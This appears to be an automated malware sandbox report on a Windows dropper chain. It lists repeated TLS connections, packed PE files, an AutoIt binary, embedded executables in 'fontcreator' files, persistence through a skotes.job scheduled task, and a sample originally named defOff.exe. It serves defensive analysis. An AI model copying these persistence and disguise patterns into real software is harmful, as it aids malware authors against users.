Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49957 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49990 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50122 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50126 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: random[1].exe1.7.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c294f4c5-4
Source: random[1].exe1.7.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_b15831b2-f
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: section name:
Source: FT773VWATWFL9SRK5RTU4.exe.0.dr Static PE information: section name: .idata
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name:
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name: .idata
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: 9eba8044e7.exe.7.dr Static PE information: section name:
Source: 9eba8044e7.exe.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: 1553f88169.exe.7.dr Static PE information: section name:
Source: 1553f88169.exe.7.dr Static PE information: section name: .rsrc
Source: 1553f88169.exe.7.dr Static PE information: section name: .idata
Source: 1553f88169.exe.7.dr Static PE information: section name:
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: section name:
Source: SWJQ0719J9GFR3PZ91XO7LBLZA7.exe.59.dr Static PE information: section name: .idata
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name:
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name: .idata
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F8F50 0_3_007F8F50
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F8F80 0_3_007F8F80
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F8F50 0_3_007F8F50
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007F8F50 0_3_007F8F50
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FC0F2 0_3_007FC0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007FDFC9 0_3_007FDFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0078AAE7 0_3_0078AAE7
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00A5E035 2_2_00A5E035
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00BCF16B 2_2_00BCF16B
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00BD0581 2_2_00BD0581
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00A6594D 2_2_00A6594D
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00BD9E83 2_2_00BD9E83
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00BF1E51 2_2_00BF1E51
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00EEE530 7_2_00EEE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F278BB 7_2_00F278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F28860 7_2_00F28860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F27049 7_2_00F27049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00EE4DE0 7_2_00EE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F231A8 7_2_00F231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F22D10 7_2_00F22D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F2779B 7_2_00F2779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F17F36 7_2_00F17F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00EE4B30 7_2_00EE4B30
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Code function: 59_3_01756968 59_3_01756968
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
PE file contains executable resources (Code or Archives)
Source: fontcreator.tmp.8.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: fontcreator.tmp.10.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: fontcreator.tmp.21.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: fontcreator.tmp.31.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
PE file contains more sections than normal
Source: fontcreator.tmp.21.dr Static PE information: Number of sections : 11 > 10
Source: fontcreator.tmp.31.dr Static PE information: Number of sections : 11 > 10
Source: fontcreator.tmp.8.dr Static PE information: Number of sections : 11 > 10
Source: fontcreator.exe0.7.dr Static PE information: Number of sections : 11 > 10
Source: fontcreator[1].exe.7.dr Static PE information: Number of sections : 11 > 10
Source: fontcreator.tmp.10.dr Static PE information: Number of sections : 11 > 10
Source: fontcreator.exe.7.dr Static PE information: Number of sections : 11 > 10
PE file does not import any functions
Source: is-DEVD7.tmp.11.dr Static PE information: No import functions for PE file found
Source: is-7T5A6.tmp.11.dr Static PE information: No import functions for PE file found
Source: is-BB72E.tmp.32.dr Static PE information: No import functions for PE file found
Source: is-9EFK3.tmp.32.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.1821540185.0000000005640000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1817570377.000000000580A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819169896.0000000005740000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1833531046.00000000052DA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814457564.00000000057AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1817408557.0000000005721000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814189108.00000000056EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824342719.000000000576B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820361387.0000000005746000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821144573.000000000588C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1817785039.0000000005722000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823214175.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813536796.00000000056DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813907089.00000000056DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822687456.0000000005888000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818353558.0000000005729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1830065616.0000000005638000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813117869.000000000563A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819374343.0000000005636000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820115881.0000000005746000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1829495656.0000000005786000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1827898804.00000000058BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814830794.0000000005701000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1827341670.000000000577C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1812958563.00000000056CF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1816723473.0000000005719000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1815236809.00000000056F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821669176.000000000576A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820484601.000000000585C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818043634.0000000005723000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1812637259.0000000005432000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1825739241.0000000005774000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1833847839.0000000005222000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813203605.00000000056D5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1812881674.0000000005638000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820851120.000000000563C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821939338.0000000005754000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813289157.0000000005634000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1833607559.000000000524C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813628532.0000000005639000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1833813471.00000000007F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818977590.0000000005639000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1816173075.0000000005635000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1831161788.0000000005782000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1831760329.00000000058E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1812801195.00000000056C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814939578.000000000563C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814551546.0000000005639000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823978803.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1815561511.0000000005711000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1830433289.0000000005790000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820723148.0000000005754000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1816832394.0000000005635000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820600891.000000000563C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1817158784.0000000005719000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813368033.00000000056E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818691253.0000000005737000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1825089160.000000000563C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814000317.0000000005784000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1816942864.0000000005717000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
